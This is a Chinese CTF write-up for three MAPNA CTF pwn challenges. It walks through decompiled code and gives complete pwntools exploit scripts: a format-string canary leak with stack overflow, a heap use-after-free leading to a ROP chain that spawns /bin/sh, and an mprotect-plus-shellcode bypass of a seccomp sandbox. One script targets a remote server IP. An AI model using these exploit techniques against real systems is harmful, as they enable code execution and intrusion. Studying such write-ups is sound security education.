char buf[264]; // [rsp+0h] [rbp-110h] BYREF
unsigned __int64 v2; // [rsp+108h] [rbp-8h]
v2 = __readfsqword(0x28u);
printf("Text length: ");
__isoc99_scanf("%d", &text_length);
getchar();
if ( (unsigned int)text_length < 0x101 )
{
printf("Key: ");
read(0, key, 0xAuLL); // \0*8 + \xff*2 覆盖length两字节造成溢出
printf("Key selected: ");
printf(key);
putchar(10);
printf("Text: ");
read(0, buf, text_length);
encrypt((__int64)buf);
printf("Encrypted output: ");
write(1, buf, text_length);
}
else
{
puts("Text length must be less than 256");
}
return v2 - __readfsqword(0x28u);
}
先是对长度作了限制,但在读入key的时候有溢出,能覆盖到长度的后两个字节形成溢出.
由于栈深度并不大,不适合覆盖第2字节,控制好长度覆盖到ret的尾字节修改尾字节到win
还有两个小点,先要泄露canary,然后要对payload用key异或
from pwn import *
p = process('./ninipwn')
context(arch='amd64', log_level='debug')
p.sendlineafter(b"Text length: ", b'256')
key = b'%39$p\x00\x00\x00\x19'
p.sendafter(b"Key: ",key)
p.recvuntil(b'0x')
canary = int(p.recv(16), 16)
print(f"{canary = :x}")
pay = b'\x00'*0x108 + flat(canary,0) + b'\x38'
p.sendafter(b"Text: ", xor(pay, key[:8]))
p.interactive()
Buggy Paint
一个堆题,add,free,show,edit都没有问题,但是edit和show都用了select来选择块而select又没有同步,这样在select后如果块已删除变成脏数据,使得edit和show还能使用,形成UAF
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
const char *v3; // rdi
int v5; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v6; // [rsp+8h] [rbp-8h]
v6 = __readfsqword(0x28u);
init_0();
v3 = "Welcome to BuggyPaint!";
puts("Welcome to BuggyPaint!");
while ( 1 )
{
sub_12A9(v3, a2);
menu();
v5 = -1;
a2 = (char **)&v5;
v3 = "%d";
__isoc99_scanf("%d", &v5);
getchar();
switch ( v5 )
{
case 1:
m1add();
break;
case 2:
m2free();
break;
case 3:
m3select(); // 6060
break;
case 4:
m4edit(); // select-free-edit实现UAF
break;
case 5:
m5show();
break;
default:
puts("Invalid option");
return 0LL;
}
}
}
1,由于块有大小限制,需要释放8块才能得到unsort
2,select后的块删除后需要再建块将数据块建到原管理块的位置来写指针
3,通过_environ得到栈地址然后在返回地址写ROP
from pwn import *
context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')
#p = process('./chall')
p = remote('3.75.185.198', 2000)
def add(idx, w,h, msg = b'A'):
p.sendlineafter(b'> ', b'1')
p.sendline(b'0')
p.sendline(str(idx).encode())
p.sendline(str(w).encode())
p.sendline(str(h).encode())
p.sendline(b'1')
p.send( msg)
def free(idx):
p.sendlineafter(b'> ', b'2')
p.sendline(b'0')
p.sendline(str(idx).encode())
def select(idx):
p.sendlineafter(b'> ', b'3')
p.sendline(b'0')
p.sendline(str(idx).encode())
def edit(msg):
p.sendlineafter(b'> ', b'4')
p.sendlineafter(b': ', msg)
def show():
p.sendlineafter(b'> ', b'5')
p.recvuntil(b"Box content:\n")
add(0,0x10,2)
add(1,0x10,2)
for i in range(2,10):
add(i,0x10,0x10)
select(2)
for i in range(3,10):
free(i)
free(2) #释放第8块到unsort利用UAF读得到libc
show()
libc.address = u64(p.recv(8)) - 0x219ce0
print(f"{libc.address = :x}")
for i in range(2,10):
add(i,0x10,0x10)
select(0)
free(0)
free(1)
#将新块数据部分建到原0块管理块位置写入到environ的指针,show得到栈地址
add(1, 0x10,3,flat(0,1,0,0x10,3,libc.sym['_environ']))
show()
stack = u64(p.recv(8)) - (0xfa8 - 0xe68)
print(f"{stack = :x}")
#重写1块,指到返回地址
free(1)
add(1, 0x10,3,flat(0,1,0,0x10,3,stack))
#gdb.attach(p,"b*0x555555555c44\nc")
#在返回地址写ROP
pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
bin_sh = next(libc.search(b'/bin/sh\x00'))
edit(flat(pop_rdi+1, pop_rdi, bin_sh, libc.sym['system']))
p.sendline(b"cat ./flag.txt")
p.interactive()
#MAPNA{1-c4n7-b3l13v3-7h47-4-bu6-c4n-l34d-70-7h15-f23f344b}
Protector
一个加了保护的ORW题
程序会在maze目录写入0x100个文件,其中包含flag并限制只通话open read write getdents close mprotect exit
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[32]; // [rsp+0h] [rbp-20h] BYREF
disable_io_buffering();
printf("Input: ");
init_sandbox();
read(0, buf, 0x98uLL);
return 0;
}
Input: line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x0b 0xc000003e if (A != ARCH_X86_64) goto 0013
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x08 0xffffffff if (A != 0xffffffff) goto 0013
0005: 0x15 0x06 0x00 0x00000000 if (A == read) goto 0012
0006: 0x15 0x05 0x00 0x00000001 if (A == write) goto 0012
0007: 0x15 0x04 0x00 0x00000002 if (A == open) goto 0012
0008: 0x15 0x03 0x00 0x00000003 if (A == close) goto 0012
0009: 0x15 0x02 0x00 0x0000000a if (A == mprotect) goto 0012
0010: 0x15 0x01 0x00 0x0000004e if (A == getdents) goto 0012
0011: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0013
0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0013: 0x06 0x00 0x00 0x00000000 return KILL
编程题,先通过溢出得到libc,然后读入后续的payload到bss然后移栈执行
得到libc后可以得到pop rax和syscall;ret,后续的payload通过mprotect将bss所在页设置成rwx并读入shellcode
shellcode打开maze目录并逐个找开目录里的文件,文件长度不为0时输出
from pwn import *
elf = ELF('./chall')
libc = ELF('./libc6_2.35-0ubuntu3.6_amd64.so')
context(arch='amd64', log_level='debug')
target = 0x404000
pop_rdi_rsi_rdx = 0x4014d9
pop_rbp = 0x00000000004011dd # pop rbp ; ret
ret = 0x4014dc
leave_ret = 0x401525
p = process('./chall')
#p = remote('3.75.185.198', 10000)
#gdb.attach(p, "b*0x401525\nc")
#leak libc, read ROP:mprotect
#libc6_2.35-0ubuntu3.6_amd64
pay = b'\x00'*0x28 + flat([ret,
pop_rdi_rsi_rdx, elf.got['printf'],0,0, elf.plt['printf'], #printf(elf.got['printf'])
pop_rdi_rsi_rdx,0,target+0x100,0x78, elf.plt['read'], #read(0,0x404100,0x78)
pop_rbp, target+0x100-8, leave_ret
])
p.sendafter(b'Input: ',pay.ljust(0x98, b'\x00'))
libc.address = u64(p.recv(6)+b'\0\0') - libc.sym['printf']
print(f"{libc.address = :x}")
syscall = libc.sym['getpid']+9
pop_rax = libc.address + 0x0000000000045eb0 # pop rax ; ret
pay2 = flat([pop_rdi_rsi_rdx, target,0x1000,7, pop_rax, 10, syscall, #mprotect(0x404000,0x1000,7)
pop_rdi_rsi_rdx, 0, target+0x200,0x100, pop_rax,0, syscall, #read(0,0x404200,0x100)
target+0x200
])
p.send(pay2)
#dir-ORW 打开目录,读目录结构到0x404400
pay_shell = 'nop;'+shellcraft.open('./maze/')+shellcraft.getdents('rax',target+0x400,0x800)
pay_shell+= f'''
mov r12, 0x404410;
s1:
xor rax,rax; mov al, byte ptr [r12]; mov r14,rax /*读目录项长度 存到r14*/
mov rdi, r12; add rdi,2;
add r12, r14
test r14,r14
jz s2
cmp r14, 0x18
jle s1
dec rdi;mov byte ptr[rdi], 0x2f; /*在文件名前加 ./maze/ */
dec rdi;mov byte ptr[rdi], 0x65;
dec rdi;mov byte ptr[rdi], 0x7a;
dec rdi;mov byte ptr[rdi], 0x61;
dec rdi;mov byte ptr[rdi], 0x6d;
dec rdi;mov byte ptr[rdi], 0x2f;
dec rdi;mov byte ptr[rdi], 0x2e;
xor rsi,rsi; xor rdx,rdx; push 2; pop rax; syscall;mov r13,rax; /* open(file,0,0) */
mov rdi,rax; mov rsi, 0x404f00; mov rdx, 0x30; push 0; pop rax; syscall; /* read(rax,0x404f00,0x30) */
test rax,rax; jz s3; /* read返回的长度 */
mov rdi,1; mov rsi, 0x404f00; mov rdx, 0x30; push 1; pop rax; syscall; /* write(1, 0x404f00,0x30) */
jmp s2
s3:
mov rdi,r13; push 3; pop rax; syscall; /* close(r13) */
test r14,r14
jnz s1
s2:
nop
'''
p.send(asm(pay_shell))
p.interactive()
#MAPNA{d3lu510n-0f-pr073c710n-28fba2}